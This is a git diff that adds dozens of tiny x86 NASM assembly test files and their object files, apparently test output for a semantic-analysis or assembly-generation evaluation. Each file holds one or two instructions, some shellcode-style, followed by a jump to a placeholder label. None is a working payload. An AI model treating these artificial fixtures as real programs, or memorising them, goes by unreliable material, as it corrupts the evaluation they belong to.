Errors/executables/GT_15.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_150.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_150.asm new file mode 100644 index 0000000000000000000000000000000000000000..5f41ee3a97b5b7fb60512877fc6caf5a63239e4f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_150.asm @@ -0,0 +1,14 @@ +section .data + +child equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp eax, ebx + je child + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_150.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_150.obj new file mode 100644 index 0000000000000000000000000000000000000000..149c2d9be397887d96c472d992e1d235bf77d356 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_150.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_155.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_155.asm new file mode 100644 index 0000000000000000000000000000000000000000..c71f4393e097d41ea40a75ed839059d7c0ef6c91 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_155.asm @@ -0,0 +1,14 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + decoder: + pop esi + mov edi, esi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_155.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_155.obj new file mode 100644 index 0000000000000000000000000000000000000000..1dccdbb9b9b771e9a696471702d06dcc93301c2d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_155.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_157.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_157.asm new file mode 100644 index 0000000000000000000000000000000000000000..96ec3a4fda31568ac02b7d473f47c7a5bb2ddff1 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_157.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov eax, 63 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_157.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_157.obj new file mode 100644 index 0000000000000000000000000000000000000000..e5066554239810793f200330b01e7298565763d1 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_157.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_158.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_158.asm new file mode 100644 index 0000000000000000000000000000000000000000..5bb5d3d9394c004c08b91ce7c0012dfd0baceb69 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_158.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al,0xa2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_158.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_158.obj new file mode 100644 index 0000000000000000000000000000000000000000..75707254cf3084c946ad74167f30f47b52f90b4e Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_158.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_163.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_163.asm new file mode 100644 index 0000000000000000000000000000000000000000..f8c15616bc2a646108bb7a5bbc0979ca4181605c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_163.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + stage: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_163.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_163.obj new file mode 100644 index 0000000000000000000000000000000000000000..9be436da96b8e71dc009e7437dbb93995e0491fb Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_163.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_167.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_167.asm new file mode 100644 index 0000000000000000000000000000000000000000..fe627d7030ba228f4f2f9e57e097b65b34e6a9ef --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_167.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov byte [esi], dl + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_167.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_167.obj new file mode 100644 index 0000000000000000000000000000000000000000..edd0cc993fd15ec4ea7fd682ba357886188b87e4 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_167.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_169.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_169.asm new file mode 100644 index 0000000000000000000000000000000000000000..3b1080460abbc7b47a86d8efaa2adaa0c09f156e --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_169.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor eax, [edi] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_169.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_169.obj new file mode 100644 index 0000000000000000000000000000000000000000..290bd68ccd5bd2e97d9a52436200d9c7828899dc Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_169.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_176.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_176.asm new file mode 100644 index 0000000000000000000000000000000000000000..18191ebfb9dee1a848213ba7fc0ac3caeaa3107f --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_176.asm @@ -0,0 +1,14 @@ +section .data + +lowbound equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp BYTE [esi], 0x7 + jle lowbound + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_176.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_176.obj new file mode 100644 index 0000000000000000000000000000000000000000..4947165b4cb82359396d95fbbf6295b244ac69a2 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_176.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_18.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_18.asm new file mode 100644 index 0000000000000000000000000000000000000000..f1ce61a94b8d2275c89d21c65c556a2de665bafc --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_18.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + get: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_18.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_18.obj new file mode 100644 index 0000000000000000000000000000000000000000..39ccbffb8ddf303e829088d1292de0f86ad64b36 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_18.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_185.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_185.asm new file mode 100644 index 0000000000000000000000000000000000000000..6c22b416841dbd5aa37c5b706e979a69430c33fa --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_185.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push 0x2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_185.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_185.obj new file mode 100644 index 0000000000000000000000000000000000000000..19d0e785367d2bfd1f34bb0e70b9fc96a2f14180 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_185.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_190.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_190.asm new file mode 100644 index 0000000000000000000000000000000000000000..42c873d4901d0e305c8593fa3a449815a5b2b33a --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_190.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push esi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_190.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_190.obj new file mode 100644 index 0000000000000000000000000000000000000000..0d10c00b985559459629f93ec5da8545095f8c82 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_190.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_191.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_191.asm new file mode 100644 index 0000000000000000000000000000000000000000..b410fc53bc31407f6df5fd78178f5a3afb29f870 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_191.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + close: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_191.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_191.obj new file mode 100644 index 0000000000000000000000000000000000000000..220b35aaee5d34684c23a781f66c57aa887ae4d6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_191.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_192.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_192.asm new file mode 100644 index 0000000000000000000000000000000000000000..f8952705325aaad4fc93c5020d15ef6148735cde --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_192.asm @@ -0,0 +1,15 @@ +section .data + +l1 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + pop ecx + loop l1 + mov eax, 1 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_192.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_192.obj new file mode 100644 index 0000000000000000000000000000000000000000..940c76814b6ceb49a13a81a58c38e9319077cc77 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_192.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_196.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_196.asm new file mode 100644 index 0000000000000000000000000000000000000000..6bf5553f4a4d81c74267fec382eeeda63c3175d6 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_196.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al, 0x01 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_196.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_196.obj new file mode 100644 index 0000000000000000000000000000000000000000..adfe4b32276696408a5649c9aa9eec9542034ed6 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_196.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_199.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_199.asm new file mode 100644 index 0000000000000000000000000000000000000000..603dd74dc0950baa162f06e4ba9aedee4cbecc43 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_199.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov edi, 0x978cd092 + mov ebx, edi + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_199.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_199.obj new file mode 100644 index 0000000000000000000000000000000000000000..1b37454480fafe33c525a1888d3fa9515d80f424 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_199.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_201.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_201.asm new file mode 100644 index 0000000000000000000000000000000000000000..f5f7653fddcdda33f983580fd6585a151d825956 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_201.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + lea ebx, [esp] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_201.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_201.obj new file mode 100644 index 0000000000000000000000000000000000000000..06e0feace93b67031e5612f5bba7b96564f17781 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_201.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_203.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_203.asm new file mode 100644 index 0000000000000000000000000000000000000000..4ce4ccb5729c03726ccc6155242f30248ec92f42 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_203.asm @@ -0,0 +1,13 @@ +section .data + +bucle equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + loop bucle + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_203.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_203.obj new file mode 100644 index 0000000000000000000000000000000000000000..45736668a45fa62f9de1c245a9b3bbbb1770ab37 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_203.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_205.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_205.asm new file mode 100644 index 0000000000000000000000000000000000000000..481f78f133e792032c4af24c54ed7eec089aa369 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_205.asm @@ -0,0 +1,13 @@ +section .data + +loop2 equ 0x42 +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + jns loop2 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_205.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_205.obj new file mode 100644 index 0000000000000000000000000000000000000000..1f6d3e9e7475640ee4bb4f3a0b8b0b938092655d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_205.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_212.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_212.asm new file mode 100644 index 0000000000000000000000000000000000000000..ccf515815c3ad614ee53d2d305ed7a079c642e16 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_212.asm @@ -0,0 +1,14 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + cmp cl, 0x11 + jb 0xff + add dl, 0x5 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_212.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_212.obj new file mode 100644 index 0000000000000000000000000000000000000000..4d84c8e89d4b829a8714b8cbc53ad0b796572944 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_212.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_218.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_218.asm new file mode 100644 index 0000000000000000000000000000000000000000..90612736f5338df0e00f9d2da9753a1986669f59 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_218.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov byte [esp], 0x2f + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_218.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_218.obj new file mode 100644 index 0000000000000000000000000000000000000000..ed08effe53ad22128194e1ac004c998a65f21c6f Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_218.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_219.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_219.asm new file mode 100644 index 0000000000000000000000000000000000000000..edb6cd05f267c56c5047b3bd33136563bed80ddc --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_219.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ebx, ebx + xor edx, edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_219.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_219.obj new file mode 100644 index 0000000000000000000000000000000000000000..9a0fd9ff83281f8db5e500e1df02a93e04f4f308 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_219.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_222.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_222.asm new file mode 100644 index 0000000000000000000000000000000000000000..e055f98132e57f770d94380a2c1a0ede6b64912c --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_222.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor ecx, ecx + mul ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_222.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_222.obj new file mode 100644 index 0000000000000000000000000000000000000000..5980f14fd4af255d03e9eb4bc76adf28e81726ba Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_222.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_224.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_224.asm new file mode 100644 index 0000000000000000000000000000000000000000..0d34f2f8cc3bae77e194f64475a4ed54b5e5ba92 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_224.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + function_5: + call [esp] + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_224.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_224.obj new file mode 100644 index 0000000000000000000000000000000000000000..9a1370b21008e272f31df043b1ee2902610bcc70 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_224.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_226.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_226.asm new file mode 100644 index 0000000000000000000000000000000000000000..af28508b526eeb2460a4d73891eec79040939b28 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_226.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xchg esi, eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_226.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_226.obj new file mode 100644 index 0000000000000000000000000000000000000000..ef9082bdd992364da1ad77092cc1c37f4ebb83cf Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_226.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_228.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_228.asm new file mode 100644 index 0000000000000000000000000000000000000000..344dd278448859a1465650b331651c4b43cc1424 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_228.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + xor edx, edx + push edx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_228.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_228.obj new file mode 100644 index 0000000000000000000000000000000000000000..7461393414d54532e43226f70fd3a300721c0e5d Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_228.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_23.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_23.asm new file mode 100644 index 0000000000000000000000000000000000000000..69c1282d7b65295e3f27541be8b3a7211f5b9427 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_23.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + zerod: + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_23.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_23.obj new file mode 100644 index 0000000000000000000000000000000000000000..c99f92cc7295d6c3e87002d080cbaaae5fbe8afe Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_23.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_230.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_230.asm new file mode 100644 index 0000000000000000000000000000000000000000..603e87b51e467477417321214712c319b6d75322 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_230.asm @@ -0,0 +1,13 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + sub ecx,ecx + push ecx + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_230.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_230.obj new file mode 100644 index 0000000000000000000000000000000000000000..3dce02ee00495cdac7c0d743a37756bd7357f720 Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_230.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_238.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_238.asm new file mode 100644 index 0000000000000000000000000000000000000000..b5de7cf9baee801ddc4d0e42f510b9a65dbade97 --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_238.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + mov al,0x6 + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_238.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_238.obj new file mode 100644 index 0000000000000000000000000000000000000000..e72b101e0022cd3e951edcf72060777a44ffdb6b Binary files /dev/null and b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_238.obj differ diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_240.asm b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_240.asm new file mode 100644 index 0000000000000000000000000000000000000000..be5d0da6a6bf0c20ada2c1d737c952bb59e0492b --- /dev/null +++ b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_240.asm @@ -0,0 +1,12 @@ +section .data + +myExitAddr db 0x56 + +section .text + +global my_start + +my_start: + + push eax + jmp myExitAddr \ No newline at end of file diff --git a/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_240.obj b/ACCA/Output/Output_Semantic_Analysis/assembly_test_output/GenEXE Errors/executables/GT_240.obj new file mode 100644 index 0000000000000000000000000000000000000000..a2ba707bd1bcd65683a6dc66625bb9e3ad0d80b4 Binary files /dev/null and 